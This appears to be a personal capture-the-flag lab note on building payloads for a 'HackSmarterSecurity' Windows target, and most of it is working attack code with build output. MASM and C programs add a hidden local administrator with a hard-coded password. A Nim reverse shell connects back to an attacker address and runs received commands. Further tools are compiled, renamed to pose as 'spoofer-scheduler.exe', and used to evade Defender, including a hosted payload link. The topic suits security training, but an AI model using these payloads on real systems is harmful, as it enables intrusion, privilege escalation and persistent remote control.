InfoSec LAB

HackSmarterSecurity_Payload

Created: 5 min read

MASM

The HACKSMARTERSEC(10.10.183.209) host has AV enabled and enforced. Executing malicious PE file will be flagged and removed by AV.

.586
.model flat, stdcall
option casemap:none
 
includelib kernel32.lib
ExitProcess proto :dword
WinExec proto :dword, :dword
 
.data
cmd db 'cmd /c "net user adm1n Qwer1234 /ADD && net localgroup Administrators /ADD adm1n"',0
 
.code
main:
  push 0            ; SW_HIDE = 0 (hide console window)
  push offset cmd   ; Command string
  call WinExec      ; Execute the command
  push 0            ; Exit code
  call ExitProcess  ; Terminate the program
end main

Creating an assembly that creates a local admin user for privilege escalation on the HACKSMARTERSEC(10.10.183.209) host.

C:\HackSmarterSecurity> ml /c /coff spoofer-scheduler.asm
Microsoft (R) Macro Assembler Version 14.29.30153.0
Copyright (C) Microsoft Corporation.  All rights reserved.
 
 Assembling: spoofer-scheduler.asm
 
C:\HackSmarterSecurity> link /SUBSYSTEM:WINDOWS /ENTRY:main spoofer-scheduler.obj
Microsoft (R) Incremental Linker Version 14.29.30153.0
Copyright (C) Microsoft Corporation.  All rights reserved.
 
C:\HackSmarterSecurity> dir
 Volume in drive C is OS
 Volume Serial Number is 1AF6-BCBE
 
 Directory of C:\HackSmarterSecurity
 
07/05/2025  07:28 PM    <DIR>          .
07/05/2025  07:19 PM    <DIR>          ..
07/05/2025  07:25 PM               477 spoofer-scheduler.asm
07/05/2025  07:28 PM             3,072 spoofer-scheduler.exe
07/05/2025  07:27 PM               788 spoofer-scheduler.obj
               3 File(s)          4,337 bytes
               2 Dir(s)  18,636,300,288 bytes free

Assembling & linking

Nim-Reverse-Shell

Reverse shell to bypass Windows Defenders.

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity]
└─$ git clone https://github.com/Sn1r/Nim-Reverse-Shell                                    
Cloning into 'Nim-Reverse-Shell'...
remote: Enumerating objects: 13, done.
remote: Counting objects: 100% (13/13), done.
remote: Compressing objects: 100% (13/13), done.
remote: Total 13 (delta 2), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (13/13), 4.22 KiB | 4.22 MiB/s, done.
Resolving deltas: 100% (2/2), done.

Cloning the repo

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity/Nim-Reverse-Shell]
└─$ curl https://nim-lang.org/choosenim/init.sh -sSf | sh
choosenim-init: Downloading choosenim-0.8.12_linux_amd64
Downloading Nim 2.2.4 from nim-lang.org
[##################################################] 100.0% 0kb/s
 Extracting nim-2.2.4-linux_x64.tar.xz
 Extracting nim-2.2.4-linux_x64.tar
   Building Nim 2.2.4
  Compiler: Already built
  Installed component 'nim'
  Installed component 'nimble'
  Installed component 'nimgrep'
  Installed component 'nimpretty'
  Installed component 'nimsuggest'
  Installed component 'testament'
  Installed component 'nim-gdb'
   Switched to Nim 2.2.4
choosenim-init: ChooseNim installed in /home/kali/.nimble/bin
choosenim-init: You must now ensure that the Nimble bin dir is in your PATH.
choosenim-init: Place the following line in the ~/.profile or ~/.bashrc file.
choosenim-init:     export PATH=/home/kali/.nimble/bin:$PATH

Installing Nim

import net, os, osproc, strutils
 
proc exe(c: string): string =
  result = execProcess("cm" & "d /c " & c)
 
var
  v = newSocket()
 
  # Change this
  v1 = "10.9.0.130"
  v2 = "443"
 
  s4 = "Exiting.."
  s5 = "cd"
  s6 = "C:\\"
 
try:
  v.connect(v1, Port(parseInt(v2)))
 
  while true:
    v.send(os.getCurrentDir() & "> ")
    let c = v.recvLine()
    if c == "exit":
      v.send(s4)
      break
 
    if c.strip() == s5:
      os.setCurrentDir(s6)
    elif c.strip().startswith(s5):
      let d = c.strip().split(' ')[1]
      try:
        os.setCurrentDir(d)
      except OSError as b:
        v.send(repr(b) & "\n")
        continue
    else:
      let r = exe(c)
      v.send(r)
 
except:
  raise
finally:
  v.close

Modifying the Nim script to the current context.

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity/Nim-Reverse-Shell]
└─$ nim c -d:mingw --app:gui rev_shell.nim               
Hint: used config file '/home/kali/.choosenim/toolchains/nim-2.2.4/config/nim.cfg' [Conf]
Hint: used config file '/home/kali/.choosenim/toolchains/nim-2.2.4/config/config.nims' [Conf]
.......................................................................................................................................
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/system/exceptions.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/std/private/digitsutils.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/std/assertions.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/system/dollars.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/system/repr_v2.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/std/widestrs.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/std/syncio.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/system.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/pure/parseutils.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/pure/strutils.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/pure/dynlib.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/windows/winlean.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/std/oserrors.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/pure/times.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/std/private/ospaths2.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/std/private/win_setenv.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/std/cmdline.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/pure/os.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/pure/nativesockets.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/std/monotimes.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/pure/net.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/pure/streams.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/pure/osproc.nim
CC: rev_shell.nim
Hint:  [Link]
Hint: mm: orc; threads: on; opt: none (DEBUG BUILD, `-d:release` generates faster code)
62047 lines; 2.400s; 91.766MiB peakmem; proj: /home/kali/archive/thm/hacksmartersecurity/Nim-Reverse-Shell/rev_shell.nim; out: /home/kali/archive/thm/hacksmartersecurity/Nim-Reverse-Shell/rev_shell.exe [SuccessX]
 
┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity/Nim-Reverse-Shell]
└─$ mv rev_shell.exe spoofer-scheduler.exe

Building complete for privilege escalation on the HACKSMARTERSEC(10.10.183.209) host.

C

#include <stdlib.h>
 
int main() {
  system("cmd.exe /c net localgroup Administrators tyler /add");
  return 0;
}

Simple C code for privilege escalation on the HACKSMARTERSEC(10.10.183.209) host.

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity]
└─$ x86_64-w64-mingw32-gcc spoofer-scheduler.c -o spoofer-scheduler.exe

Compile

update_script

Another reverse shell method to bypass Defender; update_script

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity]
└─$ git clone https://github.com/daniellowrie/update_script cd update_script
Cloning into 'update_script'...
remote: Enumerating objects: 183, done.
remote: Counting objects: 100% (180/180), done.
remote: Compressing objects: 100% (122/122), done.
remote: Total 183 (delta 96), reused 101 (delta 57), pack-reused 3 (from 1)
Receiving objects: 100% (183/183), 4.90 MiB | 8.33 MiB/s, done.
Resolving deltas: 100% (96/96), done.

Cloning the repo

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity/update_script]
└─$ go build SecUp.go

Building SecUp.go

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity/update_script]
└─$ ./SecUp $tun0
LHOST:     10.9.0.130
LPORT:     443
******************************************
[!] Start your listener on port 443
[!] Press ENTER to continue...
 
******************************************
[!] Attack files have been generated
******************************************
[-] update_script.go
[-] r1
[-] WinSecUp
 
******************************************
[!] HTTP Server is running on port 8000
[!] Press CTRL+C to Exit
 
******************************************
[!] Compile and Upload 'update_script.exe' to target and execute
[!] Check Listener for connection
 
******************************************

Setting up

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity/update_script]
└─$ GOOS=windows go build update_script.go
 
┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity/update_script]
└─$ mv update_script.exe spoofer-scheduler.exe

Compiling & renaming for privilege escalation on the HACKSMARTERSEC(10.10.183.209) host.

reverse_ssh

Another reverse shell method using SSH to bypass Defender; reverse_ssh This is more like a C2

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity]
└─$ docker run -p3232:2222 -e EXTERNAL_ADDRESS=$tun0:3232 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_ed25519.pub)" -v ./data:/data reversessh/reverse_ssh    
authorized_keys is not empty, ignoring SEED_AUTHORIZED_KEYS\n
2025/07/05 18:44:14 Loading files from /data
2025/07/05 18:44:14 connect back:  10.9.0.130:3232
2025/07/05 18:44:14 Version:  v2.6.18-2-gd042bc4
2025/07/05 18:44:14 Listening on :2222
2025/07/05 18:44:14 Loading private key from: /data/id_ed25519
2025/07/05 18:44:14 Server key fingerprint:  d67c5e650b2f4bfbaee0eff285ea9fb3a51f7b534e32dc10dce5ff3f16028162
2025/07/05 18:44:14 Started Raw Download Server
2025/07/05 18:44:14 Started Web Server

Setting up the RSSH server

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity]
└─$ docker images reversessh/reverse_ssh
REPOSITORY               TAG       IMAGE ID       CREATED       SIZE
reversessh/reverse_ssh   latest    0bb72c5830eb   6 weeks ago   2.55GB

It’s massive.

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity]
└─$ ssh localhost -p 3232
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
catcher$

Session established to the RSSH server

catcher$ link --goos windows  
http://10.9.0.130:3232/f34c0affc1580f49c4fc6f5c6217096d

Generating & hosting binary for privilege escalation on the HACKSMARTERSEC(10.10.183.209) host.

Interactive Graph View

Backlinks